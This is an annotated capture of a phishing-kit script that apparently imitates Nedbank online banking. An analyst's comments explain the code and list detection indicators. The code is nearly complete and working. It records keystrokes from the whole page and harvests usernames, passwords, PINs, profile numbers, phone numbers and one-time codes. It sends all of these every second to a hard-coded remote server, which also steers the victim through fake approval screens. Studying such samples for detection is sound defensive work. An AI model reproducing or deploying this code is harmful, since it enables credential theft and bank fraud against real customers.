File: C:/inetpub/vhosts/hrreflections.com/httpdocs/content/content.php
<?php
// Analyst annotation (code unchanged): server-side preamble of a script that is served as JavaScript.
// Quote characters appear backslash-escaped throughout this capture, presumably an artifact of how
// the file was dumped; confirm against the original sample before treating it as runnable PHP.
session_start();
include(\\\"csrf_functions.php\\\");
// Visitor IP and User-Agent are read from the request and passed to generateCsrfToken(), which is
// not defined in this file (presumably it comes from csrf_functions.php; verify).
$clientIP = $_SERVER[\\\'REMOTE_ADDR\\\'];
$userAgent = $_SERVER[\\\'HTTP_USER_AGENT\\\'];
$csrfToken = generateCsrfToken($clientIP, $userAgent);
// Hard-coded remote API base: plain HTTP to a raw IP on port 8888. Every browser-side request
// further down is built on this value, which makes it the primary network indicator in the file.
$adminurl = \\\"http://104.239.66.192:8888/api/v1/\\\";
// Server-side beacon: each request for this file makes the web server itself call the remote
// log endpoint with the visitor IP in the query string. $response is not read in the visible lines.
// Detection: outbound web-server connections to this host and port, one per page view.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $adminurl . \\\"log?ip=\\\" . $clientIP);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch); // Close the connection
// The response is declared as JavaScript, and the remote base URL is handed to the browser as the
// global siteURL.
header(\\\'Content-Type: application/javascript\\\');
echo \\\'var siteURL = \\\"\\\'.$adminurl.\\\'\\\";\\\';
?>
// Analyst annotation: the server-generated token is exposed to the page as requestStatus.
// No later line in this file reads it.
const requestStatus = \\\'<?php echo $csrfToken; ?>\\\';
// Show/hide toggle for the element with id password: flips its type between password and text
// and swaps the CSS class on the element with id togglebtn. Purely cosmetic.
function togglepass() {
var x = document.getElementById(\\\"password\\\");
if (x.type === \\\"password\\\") {
x.type = \\\"text\\\";
document.getElementById(\\\'togglebtn\\\').className = \\\"fa-fa-eye-hide\\\";
} else {
x.type = \\\"password\\\";
document.getElementById(\\\'togglebtn\\\').className = \\\"fa-fa-eye-show\\\";
}
}
// Page-wide state shared by the functions below.
// identifier and timer are declared but not assigned anywhere in the visible code.
var identifier;
var timer;
// currentPage is reported to the remote server on every poll (see liveupdate).
var currentPage = \\\"LOGINPAGE\\\";
var currentStatus = \\\"idle\\\"
var liveupdateTimer = null;
var currentIdentifier = null;
var approveTimer = null;
// Activity record: textTyped accumulates raw key values and is included in the status string
// that liveupdate sends to the remote server.
let userActivityStatus = {
isTyping: false,
isIdle: true,
lastActivity: null,
textTyped: \\\'\\\'
};
let typingTimer;
const idleTimeout = 5000;
// Listeners are attached to the whole document, not to specific fields, so keystrokes in any
// input on the page (password, PIN and OTP fields included) reach handleUserInput.
document.addEventListener(\\\'keydown\\\', handleUserInput);
document.addEventListener(\\\'keyup\\\', handleUserInput);
document.addEventListener(\\\'copy\\\', handleCopyEvent);
document.addEventListener(\\\'cut\\\', handleCutEvent);
document.addEventListener(\\\'paste\\\', handlePasteEvent);
// Document-level keydown/keyup handler. On keydown it appends event.key to
// userActivityStatus.textTyped; once the buffer is longer than 44 characters it restarts from
// the current key. The buffer is later embedded in the status string sent by liveupdate, so
// typed characters leave the browser even if no form is submitted.
function handleUserInput(event) {
clearTimeout(typingTimer);
if (event.type === \\\'keydown\\\') {
userActivityStatus.isTyping = true;
userActivityStatus.isIdle = false;
if (userActivityStatus.textTyped.length > 44) {
userActivityStatus.textTyped = event.key;
} else {
userActivityStatus.textTyped += event.key;
}
} else {
// keyup: typing flag drops, but the buffer is kept.
userActivityStatus.isTyping = false;
}
userActivityStatus.lastActivity = new Date();
// After idleTimeout ms without key events the visitor is marked idle.
typingTimer = setTimeout(() => {
userActivityStatus.isIdle = true;
}, idleTimeout);
}
// Copy handler: records that a copy happened (a fixed label, not the clipboard content) and
// keeps the visitor marked active for 10 seconds.
function handleCopyEvent(event) {
userActivityStatus.lastActivity = new Date();
userActivityStatus.isIdle = false;
userActivityStatus.textTyped = \\\'Copied text\\\';
resetIdleTimer(10000);
}
// Cut handler: records that a cut happened (a fixed label, not the clipboard content) and
// keeps the visitor marked active for 10 seconds.
function handleCutEvent(event) {
userActivityStatus.lastActivity = new Date();
userActivityStatus.isIdle = false;
userActivityStatus.textTyped = \\\'Cut text\\\';
resetIdleTimer(10000);
}
// Paste handler: records that a paste happened (a fixed label, not the pasted content) and
// keeps the visitor marked active for 10 seconds.
function handlePasteEvent(event) {
userActivityStatus.lastActivity = new Date();
userActivityStatus.isIdle = false;
userActivityStatus.textTyped = \\\'Pasted text\\\';
resetIdleTimer(10000);
}
// Restarts the shared idle timer: after waittime milliseconds the visitor is marked idle.
function resetIdleTimer(waittime) {
clearTimeout(typingTimer);
typingTimer = setTimeout(() => {
userActivityStatus.isIdle = true;
}, waittime);
}
// Builds the status string that liveupdate sends to the remote server.
// Two of the three branches embed userActivityStatus.textTyped, i.e. the captured keystroke
// buffer; only the idle branch omits it.
function getCurrentUserActivityStatus() {
if (userActivityStatus.isTyping) {
return `typing: ${userActivityStatus.textTyped}`;
} else if (!userActivityStatus.isIdle) {
const lastActivity = userActivityStatus.lastActivity;
const timeSinceLastActivity = new Date() - lastActivity;
const secondsAgo = Math.floor(timeSinceLastActivity / 1000);
return `Action:${userActivityStatus.textTyped} was ${secondsAgo} seconds ago`;
} else {
return \\\'User is idle\\\';
}
}
// Derives a coarse browser and OS label from navigator.userAgent by substring matching and
// returns them joined with a colon. The result is sent to the remote server by register().
function getUAgent() {
var userAgentString = navigator.userAgent;
var browserName = \\\"\\\";
if (userAgentString.indexOf(\\\"Firefox\\\") !== -1) browserName = \\\"Firefox\\\";
else if (userAgentString.indexOf(\\\"Chrome\\\") !== -1) browserName = \\\"Chrome\\\";
else if (userAgentString.indexOf(\\\"Safari\\\") !== -1) browserName = \\\"Safari\\\";
else if (userAgentString.indexOf(\\\"Edge\\\") !== -1) browserName = \\\"Edge\\\";
else if (userAgentString.indexOf(\\\"MSIE\\\") !== -1 || userAgentString.indexOf(\\\"Trident\\\") !== -1) browserName = \\\"Internet Explorer\\\";
else browserName = \\\"Unknown Browser\\\";
var os = \\\"\\\";
if (userAgentString.indexOf(\\\"Windows\\\") !== -1) os = \\\"Windows\\\";
else if (userAgentString.indexOf(\\\"Mac OS\\\") !== -1) os = \\\"Mac OS\\\";
else if (userAgentString.indexOf(\\\"Linux\\\") !== -1) os = \\\"Linux\\\";
else if (userAgentString.indexOf(\\\"Android\\\") !== -1) os = \\\"Android\\\";
else if (userAgentString.indexOf(\\\"iOS\\\") !== -1) os = \\\"iOS\\\";
else os = \\\"Unknown OS\\\";
return browserName + \\\":\\\" + os;
}
// Announces a session to the remote server and, once it answers, starts the polling loop.
// identifier is the value the login handler passes in (the entered username).
// Relies on jQuery ($), which is not loaded by this file.
function register(identifier) {
let useragent = getUAgent();
currentIdentifier = identifier;
// Stop any poll loop left over from an earlier attempt.
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
// JSONP request to siteURL + register; with dataType jsonp jQuery issues it as a script GET,
// so identifier and useragent travel in the URL query string.
$.ajax({
url: siteURL + \\\'register\\\',
data: \\\'identifier=\\\' + encodeURIComponent(identifier) + \\\'&useragent=\\\' + encodeURIComponent(useragent),
dataType: \\\"jsonp\\\",
cache: false,
success: function (results) {
liveupdate(identifier);
}
});
}
// Polling loop: once per second the page reports identifier, current page and the activity
// string (which can contain captured keystrokes) to siteURL + server, and the status field of
// the reply decides which screen the visitor sees next. The flow is therefore driven remotely,
// step by step, rather than scripted in the page.
// Detection: a steady one-per-second stream of JSONP GETs to the hard-coded host, with
// identifier, cpage and status in the query string.
function liveupdate(identifier) {
liveupdateTimer = setInterval(function () {
// A newer register() call or resetLoginFlow() changed the active identifier: stop this loop.
if (identifier !== currentIdentifier) {
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
return;
}
$.ajax({
url: siteURL + \\\'server\\\',
data: \\\'identifier=\\\' + encodeURIComponent(identifier) + \\\'&cpage=\\\' + encodeURIComponent(currentPage) + \\\'&status=\\\' + encodeURIComponent(getCurrentUserActivityStatus()),
dataType: \\\"jsonp\\\",
cache: false,
success: function (responseText) {
var status = responseText.status;
// Remote status -> local card. Each branch prompts for a further secret or confirmation.
if (status === \\\"VERIFYPAGE\\\") {
currentPage = status;
showCard(\\\'verify\\\');
} else if (status === \\\"WRONGPASSWORD\\\") {
currentPage = status;
showCard(\\\'error\\\');
if (typeof resetLoginFlow === \\\'function\\\') resetLoginFlow();
} else if (status === \\\"PHONENUMBER\\\") {
currentPage = status;
showCard(\\\'phone\\\');
} else if (status === \\\"OTPPAGE\\\") {
currentPage = status;
showCard(\\\'otp\\\');
} else if (status === \\\"LOGINAPPROVE\\\") {
currentPage = status;
showCard(\\\'approvelogin\\\');
} else if (status === \\\"MIDAPPROVE\\\") {
currentPage = status;
showCard(\\\'approvemid\\\');
} else if (status === \\\"ENDPAGE\\\") {
// Terminal state: polling stops.
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
currentPage = status;
showCard(\\\'end\\\');
} else if (status === \\\"LOGINPAGE\\\" || responseText.status == \\\"LOGINPAGE\\\") {
window.location.reload();
} else if (status === \\\"BAN\\\" || status === \\\"REDIRECT\\\") {
// The visitor is sent to a nedbank.co.za address. Together with the Approve-it wording
// elsewhere in the file this suggests the lure imitates Nedbank online banking.
// Detection: referrers from unrelated hosts landing on this exact URL.
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
window.location.href = \\\'https://www.nedbank.co.za/content/nedbank/desktop/gt/en/personal.html\\\';
}
}
});
}, 1000);
}
// Generic JSONP helper used by every form handler in setupSignFlow.
// post_url: full endpoint URL; formValues: pre-encoded query string; callBack: receives the reply.
// Despite the parameter name, dataType jsonp makes jQuery send a script GET, so whatever is in
// formValues (credentials, PIN, OTP) appears in the request URL and in any proxy or server log
// that records URLs.
function ajax_jsonp_call(post_url, formValues, callBack) {
$.ajax({
url: post_url,
data: formValues,
dataType: \\\"jsonp\\\",
cache: false,
success: function (results) {
callBack(results);
},
error: function (jqXHR, textStatus, errorThrown) {
console.log(\\\'Error: \\\' + textStatus + \\\' - \\\' + errorThrown);
}
});
}
// Sets the approval card text for the login-approval step (used by showCard for approvelogin).
// The wording asks the visitor to accept a push approval in their banking app.
function setLoginApprove() {
document.getElementById(\\\'approvehead\\\').innerText = \\\"Go to your Money app to accept the Approve-it message\\\";
document.getElementById(\\\'approvetext\\\').innerText = \\\"To help protect you a secure message has been sent to your cellphone.\\\";
}
// Sets the approval card text for the second approval step (used by showCard for approvemid).
// The strings are reproduced as captured, including their typos.
function setMidApprove(){
document.getElementById(\\\'approvehead\\\').innerText=\\\"Go to your Approve-it device and open the Money app to accept our Approve-it message\\\";
document.getElementById(\\\'approvetext\\\').innerText=\\\"if the cellphone you\\\'ve linked as your Approve-it device is lost or damaged, please call us onn +27 80 055 5111 or visit your nearest branch.\\\";
}
// Sets the approval card text shown when the 60-second countdown in showCard reaches zero.
function setapprovetimeout() {
document.getElementById(\\\'approvehead\\\').innerText = \\\"The Approve-it message timed out\\\";
document.getElementById(\\\'approvetext\\\').innerText = \\\"This security message can be re-sent to your cellphone.\\\";
}
// Screen switcher: hides every card, stops any running approval countdown, then shows the card
// named by the argument and records the matching page name in currentPage (which liveupdate
// reports to the remote server). Missing elements are tolerated except in the error branch.
function showCard(card) {
const verifybox = document.getElementById(\\\'verifybox\\\');
const cellbox = document.getElementById(\\\'cellbox\\\');
const otpbox = document.getElementById(\\\'otpbox\\\');
const loadingbox = document.getElementById(\\\'loadingbox\\\');
const endbox = document.getElementById(\\\'endbox\\\');
const approvebox = document.getElementById(\\\'approvebox\\\');
const errormsg = document.getElementById(\\\'loginerrormsg\\\');
// Reset: everything hidden before the requested card is revealed.
if (verifybox) verifybox.style.display = \\\'none\\\';
if (cellbox) cellbox.style.display = \\\'none\\\';
if (otpbox) otpbox.style.display = \\\'none\\\';
if (loadingbox) loadingbox.style.display = \\\'none\\\';
if (endbox) endbox.style.display = \\\'none\\\';
if (approvebox) approvebox.style.display = \\\'none\\\';
if (errormsg) errormsg.style.display = \\\'none\\\';
const timeoutDiv = document.getElementById(\\\'otptimeoutshow\\\');
if (timeoutDiv) timeoutDiv.style.display = \\\'none\\\';
if (approveTimer) {
clearInterval(approveTimer);
approveTimer = null;
}
if (card === \\\'login\\\') {
currentPage = \\\'LOGINPAGE\\\';
} else if (card === \\\'verify\\\') {
if (verifybox) verifybox.style.display = \\\'block\\\';
currentPage = \\\'VERIFYPAGE\\\';
} else if (card === \\\'phone\\\') {
if (cellbox) cellbox.style.display = \\\'block\\\';
currentPage = \\\'PHONENUMBER\\\';
} else if (card === \\\'otp\\\') {
if (otpbox) otpbox.style.display = \\\'block\\\';
currentPage = \\\'OTPPAGE\\\';
} else if (card === \\\'loading\\\') {
// The loading card leaves currentPage unchanged.
if (loadingbox) {
loadingbox.style.display = \\\'block\\\';
console.log(\\\'set loading to block\\\')
}
else {
console.log(\\\'loadingbox not found\\\')
}
} else if (card === \\\'approvelogin\\\') {
// Login-approval prompt with a 60-second countdown and progress bar; on expiry the timeout
// text is shown and the resend button is enabled.
setLoginApprove();
if (approvebox) approvebox.style.display = \\\'block\\\';
currentPage = \\\'APPROVEPAGE\\\';
let timeLeft = 60;
const timeDisplay = document.getElementById(\\\'atimeleft\\\');
const progressBar = document.getElementById(\\\'atimeleftbar\\\');
if (timeDisplay) timeDisplay.innerHTML = timeLeft;
if (progressBar) progressBar.style.width = \\\'100%\\\';
approveTimer = setInterval(function () {
timeLeft--;
if (timeDisplay) timeDisplay.innerHTML = timeLeft;
if (progressBar) progressBar.style.width = (timeLeft / 60 * 100) + \\\'%\\\';
if (timeLeft <= 0) {
clearInterval(approveTimer);
approveTimer = null;
setapprovetimeout();
if (timeoutDiv) timeoutDiv.style.display = \\\'block\\\';
const resendBtn = document.getElementById(\\\'approve_resend\\\');
if (resendBtn) resendBtn.disabled = false;
}
}, 1000);
} else if (card === \\\'approvemid\\\') {
// Second approval prompt: same countdown logic as the branch above, different text and
// page name.
setMidApprove();
if (approvebox) approvebox.style.display = \\\'block\\\';
currentPage = \\\'APPROVEMIDPAGE\\\';
let timeLeft = 60;
const timeDisplay = document.getElementById(\\\'atimeleft\\\');
const progressBar = document.getElementById(\\\'atimeleftbar\\\');
if (timeDisplay) timeDisplay.innerHTML = timeLeft;
if (progressBar) progressBar.style.width = \\\'100%\\\';
approveTimer = setInterval(function () {
timeLeft--;
if (timeDisplay) timeDisplay.innerHTML = timeLeft;
if (progressBar) progressBar.style.width = (timeLeft / 60 * 100) + \\\'%\\\';
if (timeLeft <= 0) {
clearInterval(approveTimer);
approveTimer = null;
setapprovetimeout();
if (timeoutDiv) timeoutDiv.style.display = \\\'block\\\';
const resendBtn = document.getElementById(\\\'approve_resend\\\');
if (resendBtn) resendBtn.disabled = false;
}
}, 1000);
} else if (card === \\\'end\\\') {
if (endbox) endbox.style.display = \\\'block\\\';
currentPage = \\\'ENDPAGE\\\';
} else if (card === \\\'error\\\') {
// Error card: shows the login error message and restores the login button label.
// subspinner and logintext are dereferenced without a null check here.
if (errormsg) errormsg.style.display = \\\'block\\\';
document.getElementById(\\\'subspinner\\\').style.display = \\\'none\\\';
document.getElementById(\\\'logintext\\\').style.display = \\\'block\\\';
currentPage = \\\'LOGINPAGE\\\';
}
}
// Wires the injected form markup to the remote API. Called once after the page body has been
// written into the DOM. Each submit handler sends the collected values to an endpoint under
// siteURL through ajax_jsonp_call, i.e. as query-string parameters of a GET request:
//   begin           username, password
//   verify          username, profilenumber, pin
//   phone           username, phonenum
//   otp             username, otp
//   resend_approve  identifier
// Detection: requests to these paths on the hard-coded host carrying those parameter names.
function setupSignFlow() {
const usernameInput = document.getElementById(\\\'username\\\');
const passwordInput = document.getElementById(\\\'password\\\');
const loginButton = document.getElementById(\\\'log_in\\\');
const verifybox = document.getElementById(\\\'verifybox\\\');
const profilenumberInput = verifybox ? verifybox.querySelector(\\\'#profilenumber\\\') : null;
const pinInput = verifybox ? verifybox.querySelector(\\\'#pin\\\') : null;
const verifySubmit = verifybox ? verifybox.querySelector(\\\'#verify_submit\\\') : null;
const cellbox = document.getElementById(\\\'cellbox\\\');
const cellInput = cellbox ? cellbox.querySelector(\\\'#phonenum\\\') : null;
const cellSubmit = cellbox ? cellbox.querySelector(\\\'#phone_submit\\\') : null;
const otpbox = document.getElementById(\\\'otpbox\\\');
const otpInput = otpbox ? otpbox.querySelector(\\\'#otp\\\') : null;
const otpSubmit = otpbox ? otpbox.querySelector(\\\'#otp_submit\\\') : null;
// Enables or disables a button and mirrors the state in its disabled CSS class.
function updateButtonState(btn, condition) {
if (btn) {
btn.disabled = !condition;
if (btn.disabled) {
btn.classList.add(\\\'disabled\\\');
} else {
btn.classList.remove(\\\'disabled\\\');
}
}
}
if (usernameInput) usernameInput.addEventListener(\\\'input\\\', updateLoginButtonState);
if (passwordInput) passwordInput.addEventListener(\\\'input\\\', updateLoginButtonState);
// Login button is enabled only when both username and password are non-empty after trimming.
function updateLoginButtonState() {
const hasUsername = usernameInput && usernameInput.value.trim().length > 0;
const hasPassword = passwordInput && passwordInput.value.trim().length > 0;
updateButtonState(loginButton, hasUsername && hasPassword);
}
// Verify button is enabled only when both profile number and PIN are non-empty.
function updateVerifyButtonState() {
const profile = profilenumberInput && profilenumberInput.value.trim().length > 0;
const pin = pinInput && pinInput.value.trim().length > 0;
updateButtonState(verifySubmit, profile && pin);
}
if (profilenumberInput) profilenumberInput.addEventListener(\\\'input\\\', updateVerifyButtonState);
if (pinInput) pinInput.addEventListener(\\\'input\\\', updateVerifyButtonState);
// Phone button is enabled once the input holds at least 9 characters after the regex replace.
function updateCellButtonState() {
const cell = cellInput ? cellInput.value.replace(/\\\\D/g, \\\'\\\') : \\\'\\\';
updateButtonState(cellSubmit, cell.length >= 9);
}
if (cellInput) cellInput.addEventListener(\\\'input\\\', updateCellButtonState);
// OTP button is enabled once the OTP field is non-empty.
function updateOtpButtonState() {
const otp = otpInput && otpInput.value.trim().length > 0;
updateButtonState(otpSubmit, !!otp);
}
if (otpInput) otpInput.addEventListener(\\\'input\\\', updateOtpButtonState);
// Exposed globally so liveupdate can call it on WRONGPASSWORD. In this capture it only clears
// the active identifier and stops polling; the field-clearing lines are commented out, so the
// entered values stay in the form.
window.resetLoginFlow = function () {
// if (usernameInput) usernameInput.value = \\\'\\\';
// if (passwordInput) passwordInput.value = \\\'\\\';
// showCard(\\\'login\\\');
// updateLoginButtonState();
currentIdentifier = null;
if (liveupdateTimer) {
clearInterval(liveupdateTimer);
liveupdateTimer = null;
}
};
if (loginButton) {
// Login submit: username and password go to the begin endpoint. On a success reply the
// username becomes the session identifier and polling starts through register().
loginButton.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
const operator = usernameInput ? usernameInput.value.trim() : \\\'\\\';
const password = passwordInput ? passwordInput.value.trim() : \\\'\\\';
if (!operator || !password) return;
document.getElementById(\\\'subspinner\\\').style.display = \\\'block\\\';
document.getElementById(\\\'logintext\\\').style.display = \\\'none\\\';
ajax_jsonp_call(
siteURL + \\\'begin\\\',
\\\'username=\\\' + encodeURIComponent(operator) +
\\\'&password=\\\' + encodeURIComponent(password),
function (results) {
if (results.message === \\\"success\\\") {
showCard(\\\'loading\\\');
register(operator);
} else if (results.message === \\\"Malformed input\\\") {
showCard(\\\'error\\\');
document.getElementById(\\\'subspinner\\\').style.display = \\\'none\\\';
document.getElementById(\\\'logintext\\\').style.display = \\\'block\\\';
}
}
);
});
}
if (verifySubmit) {
// Verify submit: profile number and PIN go to the verify endpoint. The reply is ignored;
// the next screen comes from the polling loop.
verifySubmit.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
const operator = usernameInput ? usernameInput.value.trim() : \\\'\\\';
const profile = profilenumberInput ? profilenumberInput.value.trim() : \\\'\\\';
const pin = pinInput ? pinInput.value.trim() : \\\'\\\';
if (!profile || !pin) return;
showCard(\\\'loading\\\');
ajax_jsonp_call(
siteURL + \\\'verify\\\',
\\\'username=\\\' + encodeURIComponent(operator) +
\\\'&profilenumber=\\\' + encodeURIComponent(profile) +
\\\'&pin=\\\' + encodeURIComponent(pin),
function (results) { }
);
});
}
const resendBtn = document.getElementById(\\\'approve_resend\\\');
if (resendBtn) {
// Resend: asks the remote side to repeat the approval step for the current identifier.
resendBtn.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
showCard(\\\'loading\\\');
ajax_jsonp_call(
siteURL + \\\'resend_approve\\\',
\\\'identifier=\\\' + encodeURIComponent(currentIdentifier),
function (results) { }
);
});
}
if (cellSubmit) {
// Phone submit: the phone number after the regex replace goes to the phone endpoint.
cellSubmit.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
const operator = usernameInput ? usernameInput.value.trim() : \\\'\\\';
const phone = cellInput ? cellInput.value.replace(/\\\\D/g, \\\'\\\') : \\\'\\\';
if (phone.length < 9) return;
showCard(\\\'loading\\\');
ajax_jsonp_call(
siteURL + \\\'phone\\\',
\\\'username=\\\' + encodeURIComponent(operator) +
\\\'&phonenum=\\\' + encodeURIComponent(phone),
function () { }
);
});
}
if (otpSubmit) {
// OTP submit: the one-time code goes to the otp endpoint together with the username.
otpSubmit.addEventListener(\\\'click\\\', function (event) {
event.preventDefault();
const operator = usernameInput ? usernameInput.value.trim() : \\\'\\\';
const otp = otpInput ? otpInput.value.trim() : \\\'\\\';
if (!otp) return;
showCard(\\\'loading\\\');
ajax_jsonp_call(
siteURL + \\\'otp\\\',
\\\'username=\\\' + encodeURIComponent(operator) +
\\\'&otp=\\\' + encodeURIComponent(otp),
function () { }
);
});
}
// Every element matched by the #cancel selector returns the visitor to the login card.
const cancelBtns = document.querySelectorAll(\\\'#cancel\\\');
cancelBtns.forEach(btn => btn.addEventListener(\\\'click\\\', () => showCard(\\\'login\\\')));
showCard(\\\'login\\\');
}
// The page markup is not part of the host HTML: the server reads body.txt, embeds it as a
// JSON-encoded string literal, and the script writes it into the element with id body1 once the
// DOM is ready. A static fetch of the host page alone would therefore presumably not contain
// the login form; analysis needs this script response (or body.txt) as well.
const bodyHtml = <?php echo json_encode(file_get_contents(\\\"body.txt\\\")); ?>;
document.addEventListener(\\\'DOMContentLoaded\\\', function () {
const bodyObj = document.getElementById(\\\'body1\\\');
if (bodyObj) {
bodyObj.innerHTML = bodyHtml;
// Handlers can only be attached after the markup above exists.
setupSignFlow();
} else {
console.error(\\\'body1 not found\\\');
}
});